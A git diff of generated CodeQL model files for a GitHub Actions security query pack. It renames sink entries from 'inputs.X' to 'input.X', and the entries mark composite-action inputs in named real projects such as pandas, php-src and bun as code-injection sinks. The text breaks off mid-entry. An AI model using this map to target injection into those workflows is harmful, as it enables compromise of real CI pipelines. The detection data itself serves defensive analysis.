a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 4ea72b28476a..564961fc6007 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.buildinfo", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index a0b7bca54ad2..8876184a0c1a 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.buildinfo", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file + - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 816a18fe73b3..7a389e89e53c 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oppia/oppia", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index bf8cbfc01e02..ca23beb6e04d 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oracle/graal", "*", "inputs.components", "code-injection", "generated"] - - ["oracle/graal", "*", "inputs.native-images", "code-injection", "generated"] \ No newline at end of file + - ["oracle/graal", "*", "input.components", "code-injection", "generated"] + - ["oracle/graal", "*", "input.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index bf88ed5c0a11..9ddc6606a6dd 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oracle/truffleruby", "*", "inputs.archive", "code-injection", "generated"] \ No newline at end of file + - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index 05c2a1cfaf67..cd04e9c8b340 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["orhun/git-cliff", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index 46a8fd4fb8b2..d986c3312262 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oven-sh/bun", "*", "inputs.download-url", "code-injection", "generated"] - - ["oven-sh/bun", "*", "inputs.bun-version", "code-injection", "generated"] \ No newline at end of file + - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] + - ["oven-sh/bun", "*", "input.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 32467f8c3f20..9b30c6599c10 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["owntracks/android", "*", "inputs.name", "code-injection", "generated"] - - ["owntracks/android", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["owntracks/android", "*", "input.name", "code-injection", "generated"] + - ["owntracks/android", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 3f4cc69ba75b..0089d9ca75d2 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pandas-dev/pandas", "*", "inputs.meson_args", "code-injection", "generated"] - - ["pandas-dev/pandas", "*", "inputs.editable", "code-injection", "generated"] - - ["pandas-dev/pandas", "*", "inputs.cflags_adds", "code-injection", "generated"] \ No newline at end of file + - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "input.editable", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "input.cflags_adds", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index 8b8ebf88b468..d64d7c38a013 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pardeike/harmony", "*", "inputs.architecture", "code-injection", "generated"] - - ["pardeike/harmony", "*", "inputs.build_configuration", "code-injection", "generated"] - - ["pardeike/harmony", "*", "inputs.target_framework_array", "code-injection", "generated"] - - ["pardeike/harmony", "*", "inputs.target_framework", "code-injection", "generated"] \ No newline at end of file + - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.build_configuration", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.target_framework_array", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.target_framework", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 4bc0d5f660d5..55a87e2df670 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pennylaneai/pennylane", "*", "inputs.requirements_file", "code-injection", "generated"] - - ["pennylaneai/pennylane", "*", "inputs.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file + - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] + - ["pennylaneai/pennylane", "*", "input.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index 5f38860c86dd..158aafbd1158 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["phalcon/cphalcon", "*", "inputs.target-name", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.ext-path", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.pecl", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.arch", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.msvc", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.ts", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.php_version", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file + - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.ext-path", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.pecl", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.arch", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.msvc", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.ts", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.php_version", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index 3122d89f28f8..ff12a54e97af 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["philosowaffle/peloton-to-garmin", "*", "inputs.framework", "code-injection", "generated"] - - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"] + - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] + - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 7767c6497806..1a92afe11a40 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["php/php-src", "*", "inputs.jitType", "code-injection", "generated"] - - ["php/php-src", "*", "inputs.runTestsParameters", "code-injection", "generated"] - - ["php/php-src", "*", "inputs.token", "code-injection", "generated"] - - ["php/php-src", "*", "inputs.configurationParameters", "code-injection", "generated"] - - ["php/php-src", "*", "inputs.libmysql", "code-injection", "generated"] \ No newline at end of file + - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] + - ["php/php-src", "*", "input.runTestsParameters", "code-injection", "generated"] + - ["php/php-src", "*", "input.token", "code-injection", "generated"] + - ["php/php-src", "*", "input.configurationParameters", "code-injection", "generated"] + - ["php/php-src", "*", "input.libmysql", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index 419909764b7d..38f2399b368e 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["phpdocumentor/phpdocumentor", "*", "inputs.passphrase", "code-injection", "generated"] - - ["phpdocumentor/phpdocumentor", "*", "inputs.secret-key", "code-injection", "generated"] \ No newline at end of file + - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] + - ["phpdocumentor/phpdocumentor", "*", "input.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 6e2b5247f292..36e983b8039b 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pinecone-io/pinecone-python-client", "*", "inputs.googleapis_common_protos_version", "code-injection", "generated"] - - ["pinecone-io/pinecone-python-client", "*", "inputs.protobuf_version", "code-injection", "generated"] - - ["pinecone-io/pinecone-python-client", "*", "inputs.lz4_version", "code-injection", "generated"] - - ["pinecone-io/pinecone-python-client", "*", "inputs.grpcio_version", "code-injection", "generated"] - - ["pinecone-io/pinecone-python-client", "*", "inputs.pinecone_client_version", "code-injection", "generated"] \ No newline at end of file + - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.protobuf_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.lz4_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.grpcio_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.pinecone_client_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index d012a6f2fbb3..006a53e83761 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pixijs/pixijs", "*", "inputs.npm-version", "code-injection", "generated"] \ No newline at end of file + - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index aead619b40be..5410cb3ff306 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["posthog/posthog", "*", "inputs.group", "code-injection", "generated"] - - ["posthog/posthog", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file + - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] + - ["posthog/posthog", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index b82360205f74..124b3cf2a5a7 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["primer/react", "*", "inputs.token", "code-injection", "generated"] - - ["primer/react", "*", "inputs.schedule-id", "code-injection", "generated"] \ No newline at end of file + - ["primer/react", "*", "input.token", "code-injection", "generated"] + - ["primer/react", "*", "input.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index e5fad4e5256e..8542583f3d94 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["project-chip/connectedhomeip", "*", "inputs.with", "code-injection", "generated"] - - ["project-chip/connectedhomeip", "*", "inputs.action", "code-injection", "generated"] - - ["project-chip/connectedhomeip", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "input.action", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index 71f90682b1bb..e85e58fb40a2 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["projectnessie/nessie", "*", "inputs.job-name", "code-injection", "generated"] - - ["projectnessie/nessie", "*", "inputs.java-version", "code-injection", "generated"] - - ["projectnessie/nessie", "*", "inputs.job-instance", "code-injection", "generated"] - - ["projectnessie/nessie", "*", "inputs.job-id", "code-injection", "generated"] \ No newline at end of file + - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.java-version", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.job-instance", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.job-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index 07421b98859a..d2005f3788a3 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["psf/black", "*", "inputs.summary", "code-injection", "generated"] \ No newline at end of file + - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 81fbb3ae9e43..7340dfccdd0d 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pyca/cryptography", "*", "inputs.key", "code-injection", "generated"] \ No newline at end of file + - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 9587351ce1d6..70022866bdd4 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pyg-team/pytorch/geometric", "*", "inputs.torchvision-version", "code-injection", "generated"] - - ["pyg-team/pytorch/geometric", "*", "inputs.cuda-version", "code-injection", "generated"] - - ["pyg-team/pytorch/geometric", "*", "inputs.torch-version", "code-injection", "generated"] \ No newline at end of file + - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "input.cuda-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "input.torch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index 080835504a6b..f7bd43cbc1e0 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["python-poetry/poetry", "*", "inputs.args", "code-injection", "generated"] \ No newline at end of file + - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index 86ce393fbc57..d85a35580b65 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["python/mypy", "*", "inputs.install_project_dependencies", "code-injection", "generated"] - - ["python/mypy", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] + - ["python/mypy", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index 182558589d78..ee0b51c72b43 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["quarto-dev/quarto-cli", "*", "inputs.keychain-pw", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.keychain", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.certificate-file", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.certificate-value", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.working-dir", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.bucket", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.base-url", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.files", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.binary-name", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.keychain", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.certificate-file", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.certificate-value", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.working-dir", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.bucket", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.base-url", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.files", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.binary-name", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 1839670baa2c..524a1f54ae41 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["quay/clair", "*", "inputs.tag", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.repo", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.quay", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.duration", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.token", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.dir", "code-injection", "generated"] \ No newline at end of file + - ["quay/clair", "*", "input.tag", "code-injection", "generated"] + - ["quay/clair", "*", "input.repo", "code-injection", "generated"] + - ["quay/clair", "*", "input.quay", "code-injection", "generated"] + - ["quay/clair", "*", "input.duration", "code-injection", "generated"] + - ["quay/clair", "*", "input.token", "code-injection", "generated"] + - ["quay/clair", "*", "input.dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 203dabaa3b9f..310f11ed1603 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["quickwit-oss/quickwit", "*", "inputs.target", "code-injection", "generated"] - - ["quickwit-oss/quickwit", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] + - ["quickwit-oss/quickwit", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 7247d125324a..441b824581c4 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -3,16 +3,16 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["r-lib/actions", "*", "inputs.lockfile-create-lib", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.dependencies", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.upgrade", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.pak-version", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.profile", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.install-pandoc", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.extra-packages", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.packages", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.needs", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.error-on", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.build_args", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.args", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.check-dir", "code-injection", "generated"] \ No newline at end of file + - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.dependencies", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.upgrade", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.pak-version", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.profile", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.install-pandoc", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.extra-packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.needs", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.error-on", "code-injection", "generated"] + - ["r-lib/actions", "*", 